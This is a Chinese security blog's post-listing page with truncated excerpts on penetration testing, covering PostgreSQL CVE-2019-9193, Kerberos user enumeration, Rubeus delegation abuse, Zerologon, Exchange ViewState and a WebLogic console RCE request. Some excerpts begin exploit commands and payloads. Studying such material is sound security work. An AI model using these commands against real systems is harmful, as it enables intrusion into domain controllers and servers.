摘要: 版权归MrHonest所有,转载请注明出处! 80386,怼站怼一宿. 后台没扫到,还有安全狗. 防御绕不过,只能玩爆破. 脚本来跨站,只能弹个'6'. 明文去交差,领导骂成狗. 来请求伪造,性别改问号. 这得算高危,赶紧写报告. 漏洞jquery,开发很气馁. 高声叫嚣着,打断我狗腿. 参数是in 阅读全文
posted @ 2020-12-17 10:33 mrhonest 阅读(705) 评论(1) 推荐(4) 编辑
摘要: (CVE-2019-9193) CVE-2019-9193:PostpreSQL 9.3-11.2 允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令: drop table if exists cmd_exec; create table c 阅读全文
posted @ 2022-01-28 23:12 mrhonest 阅读(727) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2022-01-27 01:12 mrhonest 阅读(196) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2021-12-15 15:54 mrhonest 阅读(135) 评论(0) 推荐(0) 编辑
摘要: 根据:https://mp.weixin.qq.com/s/Z3mI5eEc8-iudqdU7EZ3EQ走了一遍,留个笔记 创建机器用户hello Import-Module .\Powermad.ps1 New-MachineAccount -MachineAccount hello -Domai 阅读全文
posted @ 2021-12-13 13:07 mrhonest 阅读(2191) 评论(0) 推荐(0) 编辑
摘要: 原文:https://www.cnblogs.com/guogangj/p/4118605.html 之前没接触过证书加密的话,对证书相关的这些概念真是感觉挺棘手的,因为一下子来了一大堆新名词,看起来像是另一个领域的东西,而不是我们所熟悉的编程领域的那些东西,起码我个人感觉如此,且很长时间都没怎么搞 阅读全文
posted @ 2021-08-23 11:03 mrhonest 阅读(247) 评论(0) 推荐(1) 编辑
摘要: 原文:https://adsecurity.org/?p=3719 chrome默认翻译结果 Microsoft 随 Windows Server 2008 R2(和更新版本)提供了多个 Active Directory PowerShell cmdlet,这大大简化了以前需要将涉及 ADSI 的冗 阅读全文
posted @ 2021-07-09 09:41 mrhonest 阅读(759) 评论(0) 推荐(0) 编辑
摘要: 域渗透 用户名枚举 原理 Kerberos协议中AS阶段,kerberos返回的不同错误信息判断 用户状态 Kerberos错误 说明 目前/已启用 KDC_ERR_PREAUTH_REQUIRED 需要额外的预认证 锁定/禁用 KDC_ERR_CLIENT_REVOKED 客户端凭证已被吊销 不存 阅读全文
posted @ 2021-07-09 09:38 mrhonest 阅读(584) 评论(0) 推荐(0) 编辑
摘要: 虽然域管理员是最常用的 AD 管理员组,但还有其他几个可以使用。 可能包含服务帐户的常见特权 AD 组: 管理员 AD 域和域控制器的完全管理权限。 域管理员 对加入域的计算机的完全管理权限(默认)和对 AD 域和 DC 的完全管理权限(通过管理员组的成员身份)。 备份操作员 备份和恢复 Activ 阅读全文
posted @ 2021-07-09 09:33 mrhonest 阅读(642) 评论(0) 推荐(0) 编辑
摘要: pip install pycryptodome 阅读全文
posted @ 2021-04-30 17:05 mrhonest 阅读(114) 评论(0) 推荐(0) 编辑
摘要: 环境 域控:192.168.110.12 主机名:SYNC-DC 域内主机:192.168.1.101 主机名:mrhonest-pc 条件: + 获取到设置了非约束委派的主机system权限 利用方法 每秒监听来自域控主机(sync-dc$)的登录请求 现在是system权限 Rubeus.exe 阅读全文
posted @ 2021-01-21 10:08 mrhonest 阅读(465) 评论(0) 推荐(0) 编辑
摘要: 目标:mail.sync.net 1.需要四个参数,分别为: --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因) --validationalg = SHA1(默认,漏洞产生原因) --gener 阅读全文
posted @ 2021-01-21 09:55 mrhonest 阅读(383) 评论(0) 推荐(0) 编辑
摘要: 全程无图--因为是我编的 域控 : windows 2008 R2 192.168.1.105 mrhonest.com 第一步,将域控机器帐号密码设置为"空" python3 cve-2020-1472-exploit.py -n dc -t 192.168.1.105 第二步,使用"空"密码du 阅读全文
posted @ 2021-01-21 09:53 mrhonest 阅读(292) 评论(0) 推荐(0) 编辑
摘要: 原文: https://www.cnblogs.com/xiaozi/p/13198071.html 10个好用的Web日志安全分析工具 经常听到有朋友问,有没有比较好用的web日志安全分析工具?首先,我们应该清楚,日志文件不但可以帮助我们溯源,找到入侵者攻击路径,而且在平常的运维中,日志也可以反应 阅读全文
posted @ 2021-01-05 15:54 mrhonest 阅读(1118) 评论(0) 推荐(1) 编辑
摘要: 漏洞概述 https://daiker.gitbook.io/windows-protocol/ntlm-pian/7#5-cve-2019-1040 环境 角色 系统 计算机名 地址 域 攻击机 kali 192.168.1.103 域控 windows2012R2 sync-dc 192.168 阅读全文
posted @ 2020-12-25 10:58 mrhonest 阅读(520) 评论(0) 推荐(0) 编辑
摘要: 原文:https://blog.csdn.net/qq_41631096/article/details/104747992 怕作者删除,先保留 注:本文通过研究各种情况下实体编码和JS编码是否生效,进而总结了哪些情况下能够进行编码后,javascript代码依然能够正常执行。 解析顺序是这样的,U 阅读全文
posted @ 2020-11-26 10:35 mrhonest 阅读(1523) 评论(0) 推荐(0) 编辑
摘要: weblogic 12 GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22j 阅读全文
posted @ 2020-10-30 09:40 mrhonest 阅读(986) 评论(0) 推荐(0) 编辑
摘要: 全程无图,全靠编 参考:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247486336&idx=1&sn=2a054ededbc855622fe2ac6c8906aae0&chksm=90392d70a74ea46635bef3cd4 阅读全文
posted @ 2020-10-29 16:52 mrhonest 阅读(3307) 评论(4) 推荐(0) 编辑
摘要: 本文转载自: https://www.anquanke.com/post/id/209966 https://www.anquanke.com/post/id/209972 https://www.anquanke.com/post/id/209974 https://www.anquanke.co 阅读全文
posted @ 2020-09-28 14:58 mrhonest 阅读(471) 评论(0) 推荐(0) 编辑
摘要: 转载自:https://baijiahao.baidu.com/s?id=1611304657392579351&wfr=spider&for=pc 以前看过 MSCACHE 相关的东西,最近因为想到一个可能会有所成果的思路,所以又开始深入了解,遗憾的是最后有点鸡肋。所以在这里写一篇文章分享一下过程 阅读全文
posted @ 2020-09-25 16:29 mrhonest 阅读(1594) 评论(0) 推荐(0) 编辑